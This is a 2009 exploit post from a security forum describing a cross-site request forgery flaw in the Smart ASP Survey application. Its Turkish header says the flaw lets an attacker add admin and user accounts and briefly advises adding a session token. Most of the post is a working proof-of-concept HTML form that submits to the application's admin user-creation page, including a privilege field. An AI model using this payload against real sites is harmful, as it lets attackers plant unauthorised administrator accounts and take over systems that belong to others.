Smart ASP Survey ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Smart ASP Survey ~ XSRF Vuln.

Madde
	Author : Bug Researchers/türk komando
	Date : 13.09.2009 21:04:10
	# Smart ASP Survey ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : Smart ASP Survey # vulnerable Type : XSRF # Infection : Admin ve user eklenebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ! # author : Trk_komando < ------------------- header data end of ------------------- > < -- bug code start -- > <form action=http://preproject.com/poll/admin/adminusers.asp?stage=new method=post> <input type=text value= name=username size=15> </td> <td align=center valign=center width=128><font face=Verdana,Helvetica size=-1> <input type=text value= name=fullname size=15> </td> <td align=center valign=center width=129><font face=Verdana,Helvetica size=-1> <input type=password value= name=password1 size=15> </td> <td align=center valign=center width=123><font face=Verdana,Helvetica size=-1> <input type=password value= name=password2 size=15> </td> <td align=center valign=center width=59><font face=Verdana,Helvetica size=-1> <input type=checkbox name=privedit value=ON> </td> <td align=center valign=center width=47> <input type=image src= ../images/save.gif border=0 alt=Save> </td> <td width=14></form> < -- bug code end of -- >